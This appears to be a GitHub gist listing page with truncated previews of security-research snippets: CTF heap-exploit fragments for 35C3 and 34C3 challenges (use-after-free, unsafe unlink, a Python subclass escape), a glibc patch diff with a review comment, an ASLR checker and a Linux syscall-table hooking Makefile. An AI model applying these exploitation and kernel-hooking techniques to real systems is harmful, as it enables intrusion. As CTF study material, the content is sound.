😸
writing happy exploits

Duc Phan ducphanduyagentp

#include <stdio.h>
#include <stdlib.h>
#define chunksize 0x8
#define fakesize 0x20
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
ducphanduyagentp / exp.py
Created December 30, 2018 00:28 — forked from hama7230/exp.py
35C3 CTF collection
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
    x = '{0:016x}'.format(addr)
    return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0
ducphanduyagentp / 300.py
Created December 28, 2018 12:17 — forked from sroettger/300.py
One solution for the 34c3ctf's 300 heap challenge.
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# The 300 challenge was a heap challenge that allowed you to make allocations of size 0x300.
# You could free allocations and read/write to them even after they got freed.
# The tricky part about the challenge was that you don't control the size and can't for example use the usual fastbin techniques.
# This exploit overwrites the check_action variable so that the libc doesn't abort on errors anymore.
# Afterwards we can get a write-what-where primitive using unsafe unlink.

Poison Null Byte Patched (or maybe not)

--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -4281,6 +4281,8 @@ _int_free (mstate av, mchunkptr p, int have_lock)
       prevsize = prev_size (p);
       size += prevsize;
       p = chunk_at_offset(p, -((long) prevsize));
+ if (__glibc_unlikely (chunksize(p) != prevsize))
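Review bot: the hunk ends before the body of the `if`, so what happens on a `chunksize(p) != prevsize` mismatch is not visible here and must be checked in the full patch; as placed, the check runs after `size += prevsize` and after `p` has been rewound by `prevsize`, so it compares the size field of the chunk `p` now points to against the `prev_size` value read from the chunk being freed.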
ducphanduyagentp / checkaslr.py
Created August 4, 2018 18:39 — forked from wdormann/checkaslrfiles.py
Python script to check for PE files that are linked with /DYNAMICBASE but are not actually ASLR compatible because they lack a relocation table
'''checkaslr.py: Check for files that opt into ASLR with /DYNAMICBASE,
but do not have a relocation table to allow ASLR to function.
usage: checkaslr.py <dir>
ex: checkaslr.py "C:\Program Files\"
requires: pefile <https://github.com/erocarrera/pefile>, which should be
installable via: pip install pefile
'''
ducphanduyagentp / Makefile
Created June 22, 2017 06:30 — forked from ilammy/Makefile
Linux kernel system call table hooking
obj-m += afw.o
afw-objs := afw_main.o locate_sct.o ttgl.o
ccflags-y := -std=gnu99 -O2
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl
ducphanduyagentp / tweet_dumper.py
Created December 19, 2016 04:40 — forked from yanofsky/LICENSE
A script to download all of a user's tweets into a CSV file
#!/usr/bin/env python
# encoding: utf-8
import tweepy #https://github.com/tweepy/tweepy
import csv
#Twitter API credentials
consumer_key = ""
consumer_secret = ""
access_key = ""